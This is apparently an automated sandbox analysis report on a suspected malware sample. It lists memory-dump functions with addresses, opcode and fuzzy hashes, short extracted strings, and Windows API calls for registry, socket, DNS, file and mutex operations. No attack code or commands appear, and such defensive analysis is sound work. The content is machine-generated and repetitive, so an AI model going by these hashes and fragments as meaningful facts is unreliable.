Instruction ID: d650d584a8cab412d8639565fb39b8b8adc58bfebeab342366b3e1927f9d921f
Opcode Fuzzy Hash: 00b24485fcbd698e00256aa85a7cba14b4f3d39b05a60f203574835c85373cf4
Instruction Fuzzy Hash: 8A12BF34A18255CFCB24DF29D4857AEBBF3FF88300F25856AD4069B361DBB59886CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05433850, Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5feead41bc1d8920beb3b22cc19e41e662105f49d4686614855320d3363091
Instruction ID: db50a1412b45b46e62f3c0d1aa57a921f178512e4ed8a23e61518012d75dc5c3
Opcode Fuzzy Hash: 5b5feead41bc1d8920beb3b22cc19e41e662105f49d4686614855320d3363091
Instruction Fuzzy Hash: 7BF1E431A04119DFCB14CF98C8869FEBBB6FF88300F1589ABD515AB261D771E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05439068, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21f5d257307814b964b78dc5419510d576ab25b15153758386b10b9bf7cf83f
Instruction ID: d0f0d1f8ffe540989e855238326e47168a5a2050892775a0d431f3df5d110ee9
Opcode Fuzzy Hash: e21f5d257307814b964b78dc5419510d576ab25b15153758386b10b9bf7cf83f
Instruction Fuzzy Hash: E8818171F011159BD718DF69D885AAEBBF3AFC8310F298166E406EB365DE71DC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 05432FA8, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf0a57088463b3bfd5b260c14832db6f077eb4d0d1a43a4419a4832e4efe481
Instruction ID: 8610bde270bf975bcbedcee34f8478beb5f79a2d9737214136947fc8341f8db5
Opcode Fuzzy Hash: 4bf0a57088463b3bfd5b260c14832db6f077eb4d0d1a43a4419a4832e4efe481
Instruction Fuzzy Hash: D0817C31F001159BDB18DB69D985AAEBBF3AFC8310F2A85A6D4059B369DE719C01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 054309A0, Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05430A50
X1kr, xrefs: 05430AA2
X1kr, xrefs: 05430A5A
X1kr, xrefs: 05430A98

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr$X1kr$X1kr
API String ID: 0-2451847431
Opcode ID: 890f915da9a5776995d385c1421d191240d73f07c653ce6988b0cea9f00be5ae
Instruction ID: 276fd0dd8ba984eb307b7875d63291a113969c71184538708c06282b59ebfe23
Opcode Fuzzy Hash: 890f915da9a5776995d385c1421d191240d73f07c653ce6988b0cea9f00be5ae
Instruction Fuzzy Hash: BC518331B00114DFCB14DBA8D85DBAEB7E7AF88704F2146A6D50A9B360DB30AD06CB81

Uniqueness

Uniqueness Score: -1.00%

Function 054302E8, Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

`5kr, xrefs: 054303A5
:@Dr, xrefs: 05430537

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: :@Dr$`5kr
API String ID: 0-2548079215
Opcode ID: f9332c22785d0851f43e2a21a321d7605251b78957b573a26d79b17ec4574a6a
Instruction ID: 0d67d043e0f7134f426024c4d84da36d6f0d00a25c7417ed6108437514081414
Opcode Fuzzy Hash: f9332c22785d0851f43e2a21a321d7605251b78957b573a26d79b17ec4574a6a
Instruction Fuzzy Hash: 6B518B34A05201CFDB08DF68C455BAE7BF2EF89700F24816AD50AAB3A0DB71AC05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 05438E18, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

, xrefs: 05438F36
>_Ir, xrefs: 05438E65

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: $>_Ir
API String ID: 0-1787506450
Opcode ID: 3e45b132ddaca98898a5ddf055d7bba1f396cbd554ea16e3e4dadb7fd4d1b29e
Instruction ID: 8c1591ffef2af02ac14c5fc3b9d728c95e26790d96e8dea01a5332e184aa3653
Opcode Fuzzy Hash: 3e45b132ddaca98898a5ddf055d7bba1f396cbd554ea16e3e4dadb7fd4d1b29e
Instruction Fuzzy Hash: D341AC71F061158FDB10CF69C8825EEF7A3BB89314B24CA67E416DB769C631D80B8B91

Uniqueness

Uniqueness Score: -1.00%

Function 05432D58, Relevance: 2.6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

Strings

, xrefs: 05432E76
>_Ir, xrefs: 05432DA5

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: $>_Ir
API String ID: 0-1787506450
Opcode ID: 75656638265dc77373c3f7794a3c54dab00147d778ccce24e4e9a60776b63419
Instruction ID: 7c3cefb8fb93677e77391f4387fa6e5dee69efa78f694634efe99d498fdbeac5
Opcode Fuzzy Hash: 75656638265dc77373c3f7794a3c54dab00147d778ccce24e4e9a60776b63419
Instruction Fuzzy Hash: 4D41BE79E081159BCB10DF69C8835FEB7A3BBC8214B25C967C4169B725C7B5E8078B82

Uniqueness

Uniqueness Score: -1.00%

Function 0543C488, Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

=?1p^, xrefs: 0543C4E3
-?1p^, xrefs: 0543C504

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: -?1p^$=?1p^
API String ID: 0-2516179421
Opcode ID: edfa1e4803b8161712b61b36e251b96ee7d9c1f603b3ac5971e893e4646d6f5d
Instruction ID: 0294fa708cf8d4476a5efea92eefef5057277821c0e423ea4a662469c7aa096b
Opcode Fuzzy Hash: edfa1e4803b8161712b61b36e251b96ee7d9c1f603b3ac5971e893e4646d6f5d
Instruction Fuzzy Hash: 0611C8303042909BC714EB38959147FBB679FD62143948D9ED04BAB351CE32DC479BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0543C498, Relevance: 2.6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

Strings

=?1p^, xrefs: 0543C4E3
-?1p^, xrefs: 0543C504

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: -?1p^$=?1p^
API String ID: 0-2516179421
Opcode ID: e26c601af3d3cfa5186254ef032423d119674a234c5750dd7191ddee0b1f7be8
Instruction ID: 12f3a499df08ba809e18501c36e37ecbba32eeedf33f33f7c7f0b67ded0f24fd
Opcode Fuzzy Hash: e26c601af3d3cfa5186254ef032423d119674a234c5750dd7191ddee0b1f7be8
Instruction Fuzzy Hash: DE11B630308290CBC318EB38959117EBBA39FDA6147848D5ED00BAB350CE72EC479B96

Uniqueness

Uniqueness Score: -1.00%

Function 05435AA1, Relevance: 2.5, Strings: 2, Instructions: 24COMMON

Download Yara Rule

Strings

-S1p^, xrefs: 05435ACA, 05435ACF
lir, xrefs: 05435ABE

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: lir$-S1p^
API String ID: 0-2836240665
Opcode ID: 4ed92d448d306838a19245e7a932d5231aa0744c6aafa5d5503e160b33764d9e
Instruction ID: 4ba4d381dadfa7abe406b5fdbc71275efa67f1ec35e364da2e4bf4411aa8494d
Opcode Fuzzy Hash: 4ed92d448d306838a19245e7a932d5231aa0744c6aafa5d5503e160b33764d9e
Instruction Fuzzy Hash: 1BE0C225B8612017DB146E7ADC027AF3B4D9FC0611B05455AE406D63C1DE148C0553D9

Uniqueness

Uniqueness Score: -1.00%

Function 05435AB0, Relevance: 2.5, Strings: 2, Instructions: 20COMMON

Download Yara Rule

Strings

-S1p^, xrefs: 05435ACA, 05435ACF
lir, xrefs: 05435ABE

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: lir$-S1p^
API String ID: 0-2836240665
Opcode ID: 02d4ed1753541d349baf5faf41290b6380339272ee4aff92a36e8236223f63ca
Instruction ID: 5a166ccf62d99a49eb690e79267bf1b6992f159f3318783ad2273069bded38f6
Opcode Fuzzy Hash: 02d4ed1753541d349baf5faf41290b6380339272ee4aff92a36e8236223f63ca
Instruction Fuzzy Hash: 7AD0A738B85124179E187D7A980167F374E5EC5951301455FE506C63C0DE159D0153EA

Uniqueness

Uniqueness Score: -1.00%

Function 054312A0, Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

$ghr, xrefs: 05431349

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: 3b36ea285e17b74b15a24af4e26f8a61ae4f8b93870178f7fde990bb1e6a72c9
Instruction ID: 571863ef0123b18f4f1e286b52de9bd0b9282100ffe2ef9d4f911142d6a9a09b
Opcode Fuzzy Hash: 3b36ea285e17b74b15a24af4e26f8a61ae4f8b93870178f7fde990bb1e6a72c9
Instruction Fuzzy Hash: 3A220534A00605CFC724DF28D494AAABBF2FF88310F50859AD85A9B765DB35ED86CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05561BDD, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05561CED

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 566a5ac7602a7a0f052fc93063451e5d0106487b51c7c1c868db77d4a59497ab
Instruction ID: b49c7c4098969c750aaf8bf3a796d8a061a0a846bd24763c4ed0486a16dddbea
Opcode Fuzzy Hash: 566a5ac7602a7a0f052fc93063451e5d0106487b51c7c1c868db77d4a59497ab
Instruction Fuzzy Hash: B241B4715097C0AFE712CB25DC45F62FFB8EF42220F0884DBE9849B293D265A508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 055613E0, Relevance: 1.6, APIs: 1, Instructions: 126networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E90,?,?), ref: 055614D6

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 3e5def0ef2b56f1cc8a0b7fd8c3ae68295983c9fb32fe4d06df3793d3c3de895
Instruction ID: 426bd4699d6d50a750b546e25f4a6bc759b4d88359ea1169518d14bcfdf41352
Opcode Fuzzy Hash: 3e5def0ef2b56f1cc8a0b7fd8c3ae68295983c9fb32fe4d06df3793d3c3de895
Instruction Fuzzy Hash: 7F41426640E7C06FD3038B318C61A61BF74EF43614B0E85CBE884CF5A3D258A90AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 055621B0, Relevance: 1.6, APIs: 1, Instructions: 95timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 0556224D

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 3d533b6f7723faa41c82cebde92fd5cc01990d6e5a67440bc31cc4a0f30211e3
Instruction ID: 904e2ea9eb222fc221a9826c6073edc82e67086d886a2c5013003105c50a7aab
Opcode Fuzzy Hash: 3d533b6f7723faa41c82cebde92fd5cc01990d6e5a67440bc31cc4a0f30211e3
Instruction Fuzzy Hash: 5831D676409380AFE7128F61DC45F66BFB8EF46310F0884DBE9859F192D265A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05560390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000E90), ref: 0556045E

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c0a327f0fcc3a14847660a0bbfc126b6fd2d0f7661623f670bd64c13136c5f62
Instruction ID: 63a6122a8219d251455a6082ab7f6f2c53413c99dc1bbf6562a01b6edd1e0331
Opcode Fuzzy Hash: c0a327f0fcc3a14847660a0bbfc126b6fd2d0f7661623f670bd64c13136c5f62
Instruction Fuzzy Hash: 2931A472004384AFE7228F11CC45FA6FFA8EF06714F04499EEA859B192D3A5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 02C1AAB1

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 630c3e730ae1e7c6ca146381ab1a88a58ae4ad03334b7af872c19e8f0dae4dc0
Instruction ID: 790a079803dcdd140874efd66c297054bb21181756b15035cdc68815de7b257a
Opcode Fuzzy Hash: 630c3e730ae1e7c6ca146381ab1a88a58ae4ad03334b7af872c19e8f0dae4dc0
Instruction Fuzzy Hash: 1831D472444384AFE7228B24CC45F67BFACEF46710F08849BED809B152D264E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0556270F, Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E90,?,?), ref: 055627CA

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 1e366eb6f9020c273a2d695ac4e8fb7fd6a443b200f7b5300c42a6b22fba3cc8
Instruction ID: 3dfef537a9c76606db762d799e530a0b7b81100cafc9980e63ccd7f5d1d9d591
Opcode Fuzzy Hash: 1e366eb6f9020c273a2d695ac4e8fb7fd6a443b200f7b5300c42a6b22fba3cc8
Instruction Fuzzy Hash: 3A31817240D3C06FD7038B218C61B52BFB4EF87710F0A80CBD9848F2A3E6246909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 055600F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0556019D

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 71841a031fc5e33df4b6c06f746f12add73df264f30c6f69d171e2c4ece9b009
Instruction ID: 6ffc274d43144cdfd81bccbcff86336741a5760daabed00de58a143a53bf67f0
Opcode Fuzzy Hash: 71841a031fc5e33df4b6c06f746f12add73df264f30c6f69d171e2c4ece9b009
Instruction Fuzzy Hash: 55319171509780AFE712CB25DC85F56FFE8FF06210F08849AE984CB292D375E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 02C1ABB4

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 56ea06ba0e93dcccee0f7db8f3ef9b5557086e27db0e3e17712d8ad7bfde249d
Instruction ID: 4edf33d5a0f5ab0b9e7ae1c36b68b371f8b9f4bf1037a9c474e3fc3e12629662
Opcode Fuzzy Hash: 56ea06ba0e93dcccee0f7db8f3ef9b5557086e27db0e3e17712d8ad7bfde249d
Instruction Fuzzy Hash: 1131A272109384AFE722CB65CC85F62BFB8EF47314F08849AE985CB252D364E549CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05561D44, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05561DF6

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 81ad83eb1b14d5c308b1cb2a1cf02fc0761c0570566ddcf87c6557e0212ab752
Instruction ID: 4cbca05fcca0bc65b229ec0a55837a134ab78f356f7054401237ac8ce6e6c209
Opcode Fuzzy Hash: 81ad83eb1b14d5c308b1cb2a1cf02fc0761c0570566ddcf87c6557e0212ab752
Instruction Fuzzy Hash: 7531C2B2404780AFE722CB55DC45F96FFF8FF06320F04459AE9848B252D365A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 055604AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 0556055C

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 55f1279a915dc17e585e5d45072347247a46e59e45ed0ff445d794865c498a8e
Instruction ID: c7b5e47587128f9fbed7beea938e6d2654cdfa1ebc68d12a34317e3482960374
Opcode Fuzzy Hash: 55f1279a915dc17e585e5d45072347247a46e59e45ed0ff445d794865c498a8e
Instruction Fuzzy Hash: 9A3180711097C0AFD722CB65DC84F92BFB8AF07310F0885DAE9859B1A2D265E809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A120, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E90,?,?), ref: 02C1A1C2

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: cb67e1147ffba9742a6c761237bbb7d6a9c710ed58754e7c9e3ff7012d2a8761
Instruction ID: 3bd599f1beca5ab405fbfd57e846e0b2a278d56f6a810ee08bc7e49dcbcf4752
Opcode Fuzzy Hash: cb67e1147ffba9742a6c761237bbb7d6a9c710ed58754e7c9e3ff7012d2a8761
Instruction Fuzzy Hash: 4131D67140D3C06FD7128B358C55B62BFB4EF47620F1985DBD9C48F193D225A919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05560808, Relevance: 1.6, APIs: 1, Instructions: 81fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05560899

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f0265349ee22307dd117ab6bd0fe6a167edb901cdd750e1f6a88382bab0e402d
Instruction ID: c23dfe5c8575e99879b9ba0cc1aad7f4507703b7b2131b617412b2f80b2cbcb1
Opcode Fuzzy Hash: f0265349ee22307dd117ab6bd0fe6a167edb901cdd750e1f6a88382bab0e402d
Instruction Fuzzy Hash: 7A2148B6500244AFEB21CF65DD85F66FBE8FB48610F04886DEA899B251D371E804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 055608F0, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 05560985

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 9af691f96d9b1f873badf90d93100df16fabe19956844da3b8f5e04af9bb7491
Instruction ID: 0d1c7693ac53e49ca12c1d34f24d2c2d091434ff5d16b9feec3f76c51eb2d854
Opcode Fuzzy Hash: 9af691f96d9b1f873badf90d93100df16fabe19956844da3b8f5e04af9bb7491
Instruction Fuzzy Hash: 4A21F8B54093806FE7128B25DC41FA2BFA8EF47720F1884D7EE848B293D2646909C771

Uniqueness

Uniqueness Score: -1.00%

Function 055602AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,00000E90), ref: 05560353

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f8613cfd7cc467ce65e88554c0fdbb429b7546aeca35028e82941cdb723125a0
Instruction ID: c6256532467d0bb86e35f37623448a82c6afe88fc31395b5877f6e144e203c21
Opcode Fuzzy Hash: f8613cfd7cc467ce65e88554c0fdbb429b7546aeca35028e82941cdb723125a0
Instruction Fuzzy Hash: 6E21C775009380AFE7228F20DC45FA6FFB4EF06310F0884DAE9849B1A3D275A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05560A9B, Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E90), ref: 05560B3F

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 12d2f6b0d0880b7f0a18591383b92c15de701770d062e5b83920de95f1c71b2c
Instruction ID: d835cd4cdeb275ba1c9e9c4bb2456d602ecb704c25b6e03adc8b82ed8e7ed4cf
Opcode Fuzzy Hash: 12d2f6b0d0880b7f0a18591383b92c15de701770d062e5b83920de95f1c71b2c
Instruction Fuzzy Hash: FE21D6715083806FE722CB24DC55FA6BFA8EF42314F1880DAED849B193D364A949C761

Uniqueness

Uniqueness Score: -1.00%

Function 05561502, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 0556158E

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: e4eae6042892924a4fe1e9e3152330fbbd6e60cfb62d7af6e952eaad25bf21bf
Instruction ID: d9fe7c3743f1a3c59a9d3c943a6c6121dd64da4a436fef91f40934635071aef5
Opcode Fuzzy Hash: e4eae6042892924a4fe1e9e3152330fbbd6e60cfb62d7af6e952eaad25bf21bf
Instruction Fuzzy Hash: D321AB71408780AFE722CF61DC44FA6FFB8EF46210F08849EEA858B652D375A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AF50, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E90,?,?), ref: 02C1AFEA

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1cbbe589cfff0e32c8bfa20e7a438fe6f7fc313e5b4915d9610f7150744eac0d
Instruction ID: 88d3e3733cae2f388e9e5fbc966a5852dd63cf21d33cf59be02f0e3d08f831cd
Opcode Fuzzy Hash: 1cbbe589cfff0e32c8bfa20e7a438fe6f7fc313e5b4915d9610f7150744eac0d
Instruction Fuzzy Hash: 1321B37144D3C06FD3138B259C51B22BFB4EF87A10F0A81DBE884CB653D225A91AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0556081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05560899

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1937cc46cca1d538e6d218cbe558bf28eb3da606a82b5ddcc3090270e01e9f48
Instruction ID: 3a782a5ed76f7aafc16b74dbab24b420330e38387cc2002e99a268040cfddd2b
Opcode Fuzzy Hash: 1937cc46cca1d538e6d218cbe558bf28eb3da606a82b5ddcc3090270e01e9f48
Instruction Fuzzy Hash: 9B219C71500340AFEB21DF65C848F66FBE8FF04310F04846AE9858B291D371E404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 055609C0, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 05560A51

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: e649fbda65d8b082acf2452813d8b8c355b96223e3adc227fb16127cd46723c8
Instruction ID: 5bf2274105c525a5cd9b5c9b016275ea76b3104c1ca68b35d58d67a6a73d34ce
Opcode Fuzzy Hash: e649fbda65d8b082acf2452813d8b8c355b96223e3adc227fb16127cd46723c8
Instruction Fuzzy Hash: C3217471409380AFDB22CF65DD44F56BFB8EF46314F0884DBE9449B153D265A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 055603CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000E90), ref: 0556045E

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e235c51070b0890ea00f451ffb3b4b8c0815f969f9045879d58df2900c3164ac
Instruction ID: cbcfdca352b6e28f9978dc076cb543cf75dce76388abf83208073a16479dcfca
Opcode Fuzzy Hash: e235c51070b0890ea00f451ffb3b4b8c0815f969f9045879d58df2900c3164ac
Instruction Fuzzy Hash: 6121BE72100204AFEB31CF15DC85FA6FBA8EF04710F14895AEE469B291D6B5A949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 02C1AAB1

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ef4b8788f381dfe3c03ecc6fd8b3f60819dad913cbaea1997eae86ef3dda29e2
Instruction ID: 2954e11a2a7924805d68d356e2bd8c7e01bcef344c5619790eb9249be9e987e2
Opcode Fuzzy Hash: ef4b8788f381dfe3c03ecc6fd8b3f60819dad913cbaea1997eae86ef3dda29e2
Instruction Fuzzy Hash: 2A21CD72500204AFE721CB15CD85F6BFBECEF45720F04885AEE459A281D674E908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0556012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0556019D

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 71b8d7742855065c55cc110f2fac6177d638f2ac86a67aa17b4e8dd6307c0fe8
Instruction ID: be5e505642d4c7225e2a3759cc9915fd533cf9e020c8812f82b6d63594dfb2fc
Opcode Fuzzy Hash: 71b8d7742855065c55cc110f2fac6177d638f2ac86a67aa17b4e8dd6307c0fe8
Instruction Fuzzy Hash: 0421CD71504240AFE720DF25CD89FAAFBE8FF44310F0484AAEE498B291E771E504CA75

Uniqueness

Uniqueness Score: -1.00%

Function 05560723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 0556079F

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: c352bbc8743c20567ce100e0c53df8e501393351fe7745a38402a1487aaff8de
Instruction ID: 1ec33a0a759088bb77b6333696126be99028caf0a23575ecc79ce948437a2637
Opcode Fuzzy Hash: c352bbc8743c20567ce100e0c53df8e501393351fe7745a38402a1487aaff8de
Instruction Fuzzy Hash: 2421B0725093C09FD712CB25DC48B52BFE8FF02210F0984EAE945CF2A2E274E909CB61

